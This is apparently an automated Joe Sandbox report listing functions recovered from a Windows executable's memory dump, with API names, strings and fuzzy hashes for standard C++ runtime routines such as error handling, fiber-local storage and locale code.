                                                                Similarity
                                                                • API ID: ByteCharMultiWide$CompareInfoString
                                                                • String ID:
                                                                • API String ID: 2984826149-0
                                                                • Opcode ID: c7ff292a73157add0fb76e898066dc175f59218672ecabb4c1380f991fe55015
                                                                • Instruction ID: 0348a5797d1db31c9d3e9738dbe8be13c17cef6c3575a0f4433cf25f82bf93c6
                                                                • Opcode Fuzzy Hash: c7ff292a73157add0fb76e898066dc175f59218672ecabb4c1380f991fe55015
                                                                • Instruction Fuzzy Hash: 66A1A263B0EA8286EB22CB2494543B967D1EF86F98F444635DA5D877C6DF3CEC458340
                                                                APIs
                                                                Similarity
                                                                • API ID: ByteCharMultiStringWide
                                                                • String ID:
                                                                • API String ID: 2829165498-0
                                                                • Opcode ID: be977926f54e8f99678e66b6dfed3aaa2fea12904ec4e2e7909252ac35aba288
                                                                • Instruction ID: 976b10a4fe267c85ab43d5fe1f9c9526dd59d87adab859dae87e988b7641e439
                                                                • Opcode Fuzzy Hash: be977926f54e8f99678e66b6dfed3aaa2fea12904ec4e2e7909252ac35aba288
                                                                • Instruction Fuzzy Hash: 3C81BF72A0AB4286EB20DF64A48026D73A5FB56FE8F154635EA5D87BC6DF3CD8018700
                                                                APIs
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: 51887e40b81f6b9dcb2a3f2792477ec99a994f664744b9fb1afaed4a08f7a9d9
                                                                • Instruction ID: 0cf146a6d0b919cde7a7ed444cbffecd7a520ca188471e9cd12902a0e7b13d0e
                                                                • Opcode Fuzzy Hash: 51887e40b81f6b9dcb2a3f2792477ec99a994f664744b9fb1afaed4a08f7a9d9
                                                                • Instruction Fuzzy Hash: 13515E2290E68695EF52DF2494602FD3BA1EB43F48F588471CF8D87396DE2DAC46C702
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 3523768491-393685449
                                                                • Opcode ID: c5fc86108eb9f4d39f3ddcd34d437f5d6ef7e4a552dee04ad6716edea358470b
                                                                • Instruction ID: 6672ca8e4a806e54af3dd3817323faa91039bbf02c2a7513b1c3e43beab1eab6
                                                                • Opcode Fuzzy Hash: c5fc86108eb9f4d39f3ddcd34d437f5d6ef7e4a552dee04ad6716edea358470b
                                                                • Instruction Fuzzy Hash: 2AE17E7390A6828AE720DF25D4803ED3BA0FB57B58F144135DE9D97A96DF38E985CB00
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3A4B
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3A81
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3AAE
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3ABF
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3AD0
                                                                • SetLastError.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3AEB
                                                                Similarity
                                                                • API ID: Value$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2506987500-0
                                                                • Opcode ID: 27d77956a10e90ab490f0c721eba82fc7909f63d3c8e08e5310a8756c397005d
                                                                • Instruction ID: 21f88aa6ab6007ef8c7a2a95df1f709942b73c29e08a5002e9bd15e9fbd02569
                                                                • Opcode Fuzzy Hash: 27d77956a10e90ab490f0c721eba82fc7909f63d3c8e08e5310a8756c397005d
                                                                • Instruction Fuzzy Hash: 3F114A24E0F24242FA59E76AA69503A6242EF46FB0F054738E83E877D6DE6CEC494710
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: ctypestd::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 3792656898-1866435925
                                                                • Opcode ID: fbfb89558d0a17bf34c80106cecc880b6de4e3a01342ff032f17d40910d8e845
                                                                • Instruction ID: ed070272a231172839b897e72349a53f22393beb22edc4da18da04cc72d3ec4e
                                                                • Opcode Fuzzy Hash: fbfb89558d0a17bf34c80106cecc880b6de4e3a01342ff032f17d40910d8e845
                                                                • Instruction Fuzzy Hash: 23618D3260AA869AEB50DF29D4803AD37A4FB45F88F454032EB4D87B6ADF3DD855C310
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Maklocstr$Getvals
                                                                • String ID: false$true
                                                                • API String ID: 3025811523-2658103896
                                                                • Opcode ID: d93070d2a64ccebe3fb8e75912a707a1e32fe0ada422d9842361ea70ddb92595
                                                                • Instruction ID: 7b8d7a7817a7f8fe33a72ccb9d33d11657e347ce945534f90d46ca50c81b01b8
                                                                • Opcode Fuzzy Hash: d93070d2a64ccebe3fb8e75912a707a1e32fe0ada422d9842361ea70ddb92595
                                                                • Instruction Fuzzy Hash: 03416936B09B8199F710DF74E4401ED33B1FB99B48B415226EE4D67A4AEF38D99AC340
                                                                APIs
                                                                • std::make_error_code.LIBCPMTD ref: 00007FF6A54B17A8
                                                                • std::ios_base::failure::failure.LIBCPMTD ref: 00007FF6A54B17BA
                                                                  • Part of subcall function 00007FF6A54DE318: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE368
                                                                  • Part of subcall function 00007FF6A54DE318: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE3A9
                                                                Strings
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaisestd::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 1846417002-1866435925
                                                                • Opcode ID: 78cef2a9afe0b937c80230caf7cbd67644b82806d9d59776d326b93e520df914
                                                                • Instruction ID: 04a52370b51833303c0dfdf31aa7d90b17f8328029c5c098f0f6b442a4cad7a6
                                                                • Opcode Fuzzy Hash: 78cef2a9afe0b937c80230caf7cbd67644b82806d9d59776d326b93e520df914
                                                                • Instruction Fuzzy Hash: A4216A32A0EB829AE760DB14E44166E77A0F789B84F544035E6CDC3BAADF3CD904CB04
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: std::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 337632640-1866435925
                                                                • Opcode ID: 1196825653b927798f1895748cbfed1d3d2bc0b462b5051efe7998ace02aad85
                                                                • Instruction ID: 8e1a94dae5cd2de6e95e315d6fe525987beeb2feeac946e8caa9442a7e019844
                                                                • Opcode Fuzzy Hash: 1196825653b927798f1895748cbfed1d3d2bc0b462b5051efe7998ace02aad85
                                                                • Instruction Fuzzy Hash: AFF028A2A1B60A96FF44DB00E4426F52360FB51B48F940431D60D875A6DF3CE90AC341
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: std::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 337632640-1866435925
                                                                • Opcode ID: f77470be03ffc2e228dc63f3974c499a890b9becc41ccba0fc7a39c00e8bc535
                                                                • Instruction ID: d3e4de56969b99f96ca5187c02772ced6d988ac098664ae6e96e9598a82ea4ee
                                                                • Opcode Fuzzy Hash: f77470be03ffc2e228dc63f3974c499a890b9becc41ccba0fc7a39c00e8bc535
                                                                • Instruction Fuzzy Hash: 10F0F6B1E1F90A96FA44EB00D4466F92330EF61B44F854431D64DC69ABEF3CD945C341
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 37b341b9e68ca2947967fc6e98ff1dce805f9c5796a89e283bc6a4e4ae7836e5
                                                                • Instruction ID: bc4ebce3d7eecb0be2a25050f68d4b24c6df04fcd74bd7cb00b96ef739a0b497
                                                                • Opcode Fuzzy Hash: 37b341b9e68ca2947967fc6e98ff1dce805f9c5796a89e283bc6a4e4ae7836e5
                                                                • Instruction Fuzzy Hash: 3CF06265B2AB0685FF14CB28E8453795720EF86F65F540636C96E861E4CF2DDC48C740
                                                                APIs
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: 0878affc78bd18bd4d18787875569a156cd14996a9b246bc248bbbc5629d56dc
                                                                • Instruction ID: 7962f364fbdd490b4f18c065341998ad02020af3308700e56b0b670ed21a4023
                                                                • Opcode Fuzzy Hash: 0878affc78bd18bd4d18787875569a156cd14996a9b246bc248bbbc5629d56dc
                                                                • Instruction Fuzzy Hash: B6B18D23A0BA86A1EB75DB15944077967E0EF46F84F098436DE4D8B795EE2CEC92C300
                                                                APIs
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: c7fee55b1fe8e37091ef471a5dfb78c4a2ff78bda4d1f9acb92240a7042a8983
                                                                • Instruction ID: 2320fe4ca23f5893b19c46972a66bf632851fd036b4218a16a70b828a4f9ed81
                                                                • Opcode Fuzzy Hash: c7fee55b1fe8e37091ef471a5dfb78c4a2ff78bda4d1f9acb92240a7042a8983
                                                                • Instruction Fuzzy Hash: 6C81F412D0AA464AF276CB3DA84077A7750EF47F94F044231EA5EA69D4DF3DED898B00
                                                                APIs
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                • Instruction ID: cc759e82d6cd2faf84947c0e5f3c17c8b07e9a245c651d26fc72ada1a036e302
                                                                • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                                • Instruction Fuzzy Hash: 48110A6FE1EE0389F7589169E4523790040AF57F78F594636EB6ECA2DAAE1CEC444300
                                                                APIs
                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B23
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B42
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B6A
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B7B
                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A54E2D57,?,?,00000000,00007FF6A54E2FF2,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54F3B8C
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: 00c6fbaa970bde4532dbe88b5cbe365500f69e3f9223cf134e003389b55fd81d
                                                                • Instruction ID: 1cbaf9d03b7094458d7629260ce0ad954a1df7ccd7d2150cb20ee0da3fb3b945
                                                                • Opcode Fuzzy Hash: 00c6fbaa970bde4532dbe88b5cbe365500f69e3f9223cf134e003389b55fd81d
                                                                • Instruction Fuzzy Hash: 3B117C20A0F64241FA5CE7296AA61791242EF87FB0F084734E83DC77D6DE2CEC094700
                                                                APIs
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID:
                                                                • API String ID: 3702945584-0
                                                                • Opcode ID: 95840472770fdb9c6052a747c6ac3a5ec5e20f2c31c595646b27a6c3bdd3b62c
                                                                • Instruction ID: 95c8925bcf183ea644998a4a393deb5e6ecae303545fd68ca783311d3c265079
                                                                • Opcode Fuzzy Hash: 95840472770fdb9c6052a747c6ac3a5ec5e20f2c31c595646b27a6c3bdd3b62c
                                                                • Instruction Fuzzy Hash: C111F714E0B24342FA6DE67A68925791245DF87F70F194B38E93ECA2D2DD2CBC494710
                                                                APIs
                                                                Similarity
                                                                • API ID: CloseHandleHeapProcess$FreeTerminate
                                                                • String ID:
                                                                • API String ID: 1603644941-0
                                                                • Opcode ID: e46810fe6f0cb646d3a61825d66203b2e1f31f7dd631d30bb055e965b888b515
                                                                • Instruction ID: 73a90daff13ebc2906e7d38b83b3fd3e7c1311ec2e5ceca2a7ecbb704a00495b
                                                                • Opcode Fuzzy Hash: e46810fe6f0cb646d3a61825d66203b2e1f31f7dd631d30bb055e965b888b515
                                                                • Instruction Fuzzy Hash: 6A010435929B4181D654DB25E44871963A0FBCAF65F505231E66F837F4CF3CD845C700
                                                                APIs
                                                                Similarity
                                                                • API ID: CloseHandleHeapProcess$FreeTerminate
                                                                • String ID:
                                                                • API String ID: 1603644941-0
                                                                • Opcode ID: c998734ac52e21941be4bbbdd5349791fe456c945ddb9cf23040b05087e31767
                                                                • Instruction ID: d9e36e6b3db13c49175e15b3e555da128630f058048de7c88b27a870bd3cbcc6
                                                                • Opcode Fuzzy Hash: c998734ac52e21941be4bbbdd5349791fe456c945ddb9cf23040b05087e31767
                                                                • Instruction Fuzzy Hash: 3C01E82691EA8186E654DB61E45837AA361FFCBF59F400132E64EC26E8DF6CE849C700
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %$+
                                                                • API String ID: 0-2626897407
                                                                • Opcode ID: 0585d5205dcc34acdb9730a8ed53485f92eadd230b47e5a928e6ae8ed1d0e68a
                                                                • Instruction ID: 62ab08238b242a5d0f1fb0c2bc7b0838fee91fa99be9e5440c8e83de531cb16a
                                                                • Opcode Fuzzy Hash: 0585d5205dcc34acdb9730a8ed53485f92eadd230b47e5a928e6ae8ed1d0e68a
                                                                • Instruction Fuzzy Hash: BDA1BE63B09B8585EB10CBA5E4402ED73A1FB9AB98F444132DE4D57B99DF7CD84AC300
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: CallEncodePointerTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3544855599-2084237596
                                                                • Opcode ID: f04d3499122c71daeb279c149854d81f5e6cc394a52a16fdb6094a55e056053c
                                                                • Instruction ID: f73076c7c7117b35f9c031398fce8fa3fd1f8826742e65494dcda7a5a27845a6
                                                                • Opcode Fuzzy Hash: f04d3499122c71daeb279c149854d81f5e6cc394a52a16fdb6094a55e056053c
                                                                • Instruction Fuzzy Hash: 3C91A173A097818AE710DB65D8806EC7BB0FB46B88F144139EE8D97B55DF38E595CB00
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 2395640692-1018135373
                                                                • Opcode ID: 2f9cd0233e9e69d1c3b070e3dee42124cfc35ce54e5d401af1a5d189a9220579
                                                                • Instruction ID: 8e4cf1766e943472690853b5e28f5868eacf75b355fb4cf6b68d2fbcf7c917c3
                                                                • Opcode Fuzzy Hash: 2f9cd0233e9e69d1c3b070e3dee42124cfc35ce54e5d401af1a5d189a9220579
                                                                • Instruction Fuzzy Hash: 2C516C32A1AA02AAEB64CA15E444B7C77D1EB56F98F518131EE4A87788DE7DEC41C700
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 3896166516-3733052814
                                                                • Opcode ID: a86ef434612143075bbdd04d63bf48d03f65813a07eb0900109ee8a7c2088b10
                                                                • Instruction ID: d8718572966050fc533deb3cedaabd228770a89a6f9f3c76ef7335d6661b06c1
                                                                • Opcode Fuzzy Hash: a86ef434612143075bbdd04d63bf48d03f65813a07eb0900109ee8a7c2088b10
                                                                • Instruction Fuzzy Hash: 1D517A32A4A6828AEB64CE1194443A877A0FB57F94F186236DE9DC7B95CF3CEC50C701
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: CallEncodePointerTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3544855599-2084237596
                                                                • Opcode ID: e156b7965f5a78edd26b9392e9ff10746d28d4ee99f19db6ac8fc00c0fbcd491
                                                                • Instruction ID: 78705a41e328671628bcfa71d8935eb5941811c33f7ee26345c6a8d705606422
                                                                • Opcode Fuzzy Hash: e156b7965f5a78edd26b9392e9ff10746d28d4ee99f19db6ac8fc00c0fbcd491
                                                                • Instruction Fuzzy Hash: 9E617D32909B8585E760DB15E4407EABBA0FB86B98F044225EF9D43B99DF3CE590CB00
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Maklocwcsstd::_$Getvals
                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                • API String ID: 1848906033-3573081731
                                                                • Opcode ID: 20d17f0921c237d0de6d91384bc47cf2696aee48f3005f21adfec8ed185b2984
                                                                • Instruction ID: 830715c157c44f9e103d36f04c0c0b248bf0407bed348defbc595a5843000de7
                                                                • Opcode Fuzzy Hash: 20d17f0921c237d0de6d91384bc47cf2696aee48f3005f21adfec8ed185b2984
                                                                • Instruction Fuzzy Hash: 9C418E72A09B918BE764CB26D09036E7BB1FB96B41F054225DB8A83E52DF28F855C740
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Maklocstr
                                                                • String ID: false$true
                                                                • API String ID: 2987148671-2658103896
                                                                • Opcode ID: b7d1604d96d86383e41236cad14531fac3b77cce468fc734a9d049e5f0c58e54
                                                                • Instruction ID: 02780b287b29d61de92f6d5cac7cb7bfa34cfcb9cff59f5426bf5e16a24d3beb
                                                                • Opcode Fuzzy Hash: b7d1604d96d86383e41236cad14531fac3b77cce468fc734a9d049e5f0c58e54
                                                                • Instruction Fuzzy Hash: 22416823B19B8599E710DF70E4401ED33B0FB99B88B414126EE4D67A5AEF38D9A5C384
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54B4888: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF6A54B3C21), ref: 00007FF6A54B489D
                                                                  • Part of subcall function 00007FF6A54B486C: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF6A54B3C2B), ref: 00007FF6A54B4875
                                                                • _Subatomic.LIBCONCRTD ref: 00007FF6A54B3C7E
                                                                • _Subatomic.LIBCONCRTD ref: 00007FF6A54B3D1A
                                                                Strings
                                                                Similarity
                                                                • API ID: PerformanceQuerySubatomic$CounterFrequency
                                                                • String ID: d
                                                                • API String ID: 3831891851-2564639436
                                                                • Opcode ID: 64ebd66bc83ceef4b8d15525a455d3072b0243a7d4ac053826e9364530fc143a
                                                                • Instruction ID: 9048f5e4366cab849f9b85f811c91c0f41b4608b95a50ecbbcecb3c999c304da
                                                                • Opcode Fuzzy Hash: 64ebd66bc83ceef4b8d15525a455d3072b0243a7d4ac053826e9364530fc143a
                                                                • Instruction Fuzzy Hash: C631F43260EB8481DAA0DB1AF48136AB7A5F7C5B94F015136E6CE87B69EF3CD5108B00
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: InitializeUninitializeshared_ptr
                                                                • String ID: "
                                                                • API String ID: 4131599277-123907689
                                                                • Opcode ID: efcb042e080e67c259898b0013473d7730a1d8b333d2afaad245a6d2cb1685fd
                                                                • Instruction ID: fe647aa98c8049f2d040eb01b7bffecbab084df49ed9bb140730a1c89c161a55
                                                                • Opcode Fuzzy Hash: efcb042e080e67c259898b0013473d7730a1d8b333d2afaad245a6d2cb1685fd
                                                                • Instruction Fuzzy Hash: 6E31E87651E68186E7A0DB14E45436AB7A0EB86B94F502036FB8A87B68DF7CD844CB00
                                                                APIs
                                                                Similarity
                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 2718003287-0
                                                                • Opcode ID: 211312053549f8ee8b16daa413eb884fc66a327672e7ef1e31147716bce4d710
                                                                • Instruction ID: 703dfccb5feaf7b7778978f50262407520900c1486757605e19c862eceb7d2c1
                                                                • Opcode Fuzzy Hash: 211312053549f8ee8b16daa413eb884fc66a327672e7ef1e31147716bce4d710
                                                                • Instruction Fuzzy Hash: A1D1F432B09A819AE711CF79D4406AC37B1FB46F98F144236DE5D9BB99DE38D91AC300
                                                                APIs
                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A54F8DE3), ref: 00007FF6A54F8F14
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A54F8DE3), ref: 00007FF6A54F8F9F
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode
                                                                • String ID:
                                                                • API String ID: 953036326-0
                                                                • Opcode ID: f1375f970a76da0d44942091db7df71d344221770975c47f3dfdc3c3d97817d0
                                                                • Instruction ID: 06502282e75aa5d0cf2225d4172d872b7454a26103d1f6a8c732176ce1a0b10b
                                                                • Opcode Fuzzy Hash: f1375f970a76da0d44942091db7df71d344221770975c47f3dfdc3c3d97817d0
                                                                • Instruction Fuzzy Hash: 0A91B672B1965299FB50CF6994802BD3BA0EF46F88F544139DE0EDBA95DF38D889C310
                                                                APIs
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC6D2
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC87D
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC892
                                                                  • Part of subcall function 00007FF6A54B3960: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54B396E
                                                                  • Part of subcall function 00007FF6A54B3960: _Max_value.LIBCPMTD ref: 00007FF6A54B3993
                                                                  • Part of subcall function 00007FF6A54B3960: _Min_value.LIBCPMTD ref: 00007FF6A54B39C1
                                                                • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF6A54AC9C7
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$Max_valueMin_value
                                                                • String ID:
                                                                • API String ID: 348937374-0
                                                                • Opcode ID: 52043a82d91c0c531d7f0aa650638332654ae7400ce2e9716a245f7f6f74b5a4
                                                                • Instruction ID: 2db579cd7b1309c023f635a47583861e925396d2c49d933716134b89fd50b502
                                                                • Opcode Fuzzy Hash: 52043a82d91c0c531d7f0aa650638332654ae7400ce2e9716a245f7f6f74b5a4
                                                                • Instruction Fuzzy Hash: 3AA1ED2661EB8585DAA0DB56E49036FB7A0F7C9BC4F004136EBCD87B6ADE2CD4508B40
                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 20f952b95b39423f2e834fb4f9d70f19447ce98c27c7846c75932ab472913a72
                                                                • Instruction ID: fe28e7bdd71dfe413ecc841b2ce5e333d430563eea951c1c2b2f8d0901af55fd
                                                                • Opcode Fuzzy Hash: 20f952b95b39423f2e834fb4f9d70f19447ce98c27c7846c75932ab472913a72
                                                                • Instruction Fuzzy Hash: 92418526B0AA4291EB15EB55E4402BC63A5FF46FA4F580132DE4DC77A6DE7CEC82C310
                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 5f102a975c722a4baeed48626eb4b926815fe391fbe247a745d5d4ede05e206a
                                                                • Instruction ID: 729d89cb73d541d291d802c6a95be680af62414a637f311ba0198945b6b4acb3
                                                                • Opcode Fuzzy Hash: 5f102a975c722a4baeed48626eb4b926815fe391fbe247a745d5d4ede05e206a
                                                                • Instruction Fuzzy Hash: 92415E26A0BA4281EA15EF55E4401BC6761FF96FA4F180532DE1D87696DF7CFC86C320
                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 654737a287ff8c336bcfb59873d788543a12bafc940bcce2ca611e93a6fda962
                                                                • Instruction ID: 033bfe95b99b23ae0fc293b63382ac1f7f11c9f2f94063bb8091497a1d798b84
                                                                • Opcode Fuzzy Hash: 654737a287ff8c336bcfb59873d788543a12bafc940bcce2ca611e93a6fda962
                                                                • Instruction Fuzzy Hash: 88416E36A0AA4291EA15EF55E4401BC6761FF86F90F0A1231DE1DC7296DE3CEC42C320
                                                                APIs
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: 82ef9762d116206a9ccbb816db9741084e886a717f3aa28472a3f8edb0d32f9b
                                                                • Instruction ID: f8404488ff9a24dd150141b30a929a678e45b3058a8919a1135cafde74a7981e
                                                                • Opcode Fuzzy Hash: 82ef9762d116206a9ccbb816db9741084e886a717f3aa28472a3f8edb0d32f9b
                                                                • Instruction Fuzzy Hash: DF41322290AAC5D9EB52DF25D4142F93BA0EB47F58F498071CB8D8734AEE3D9845C311
                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: 850366757b357ba1f3bdf3103d901588ad0ebbeae1cb3b2b79265ac9088d748a
                                                                • Instruction ID: 3a25c10f8bb387f0753d3bcc7011adf28e1576606e169eda4bfb23b05b2cfb08
                                                                • Opcode Fuzzy Hash: 850366757b357ba1f3bdf3103d901588ad0ebbeae1cb3b2b79265ac9088d748a
                                                                • Instruction Fuzzy Hash: 1E314D36A0BA4285EA05EF55E8401BD6761EF96FA0F180131DA0D876A6DF7CFC86C320
                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: b214aa75b3925880e37dfd82643918b82af9d5d8fae4848c120db6a7df8e30af
                                                                • Instruction ID: 3306bcc01eea131fc942c4345cdb58f877ce82d351b4be5259e5e7ec470c350e
                                                                • Opcode Fuzzy Hash: b214aa75b3925880e37dfd82643918b82af9d5d8fae4848c120db6a7df8e30af
                                                                • Instruction Fuzzy Hash: 55318025A0AA4281EB05EF55E4401BD6761EF96FA0F580132DA0DC77A5DFBCFC46C320
                                                                APIs
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: dd61e209954328c3efc53be8d5d4842e416a8f47be5cb8321d95453dd1f5f65a
                                                                • Instruction ID: 79d13d1d18f1a2d054c4d15749974cf0a1fb0567e435c8d2eabdfa9f7a5e1807
                                                                • Opcode Fuzzy Hash: dd61e209954328c3efc53be8d5d4842e416a8f47be5cb8321d95453dd1f5f65a
                                                                • Instruction Fuzzy Hash: 60318E25A0AA4285FA05EF55E8001BD6761FF96FA1F080532DA0DC76A9DF7CFC46C320
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                • String ID:
                                                                • API String ID: 593203224-0
                                                                • Opcode ID: e73724cc9f484c6959b64651cfc36035642c7cc7c7d88766abc4696fe8a4cb7f
                                                                • Instruction ID: fd884b50a31183fc3718151cc75c2556de7eacb0997a7d14af99c95bf45abba4
                                                                • Opcode Fuzzy Hash: e73724cc9f484c6959b64651cfc36035642c7cc7c7d88766abc4696fe8a4cb7f
                                                                • Instruction Fuzzy Hash: 15314F36A0AA4281EA05EF55E4402BD6761FF96FA1F180231DA1D876A6DF7CFC46C324
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
